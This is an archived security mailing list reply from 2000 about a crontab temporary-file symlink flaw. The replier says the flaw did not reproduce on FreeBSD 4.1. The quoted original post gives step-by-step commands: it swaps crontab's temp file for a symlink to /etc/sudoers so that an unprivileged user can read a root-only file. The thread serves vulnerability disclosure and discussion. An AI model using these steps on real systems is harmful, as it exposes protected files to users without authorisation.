OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
From: Andrey Alekseyev (uitmZENON.NET)
Date: Wed Oct 25 2000 - 07:07:23 CDT

Well, performing a quick test I was unable to reproduce
example below with crontab that comes with FreeBSD 4.1-RELEASE.
I was only able to install files containing more than 3
characters in a line and only if these were digits.
Otherwise crontab complains about line format.
I was also able to successfully install a file with all
lines commented out with '#' (local /etc/inetd.conf).
Of course, it's possible to import /etc/crontab mode 0600.

> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file wich start with comment simbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make simbolik link]
> > rm /tmp/crontab.hLmjTbK417
> > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> > exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers
> file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If file started with no # then crontab sad
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alfisd.memonet.ru>
> 

--
Andrey Alekseyev. Zenon N.S.P.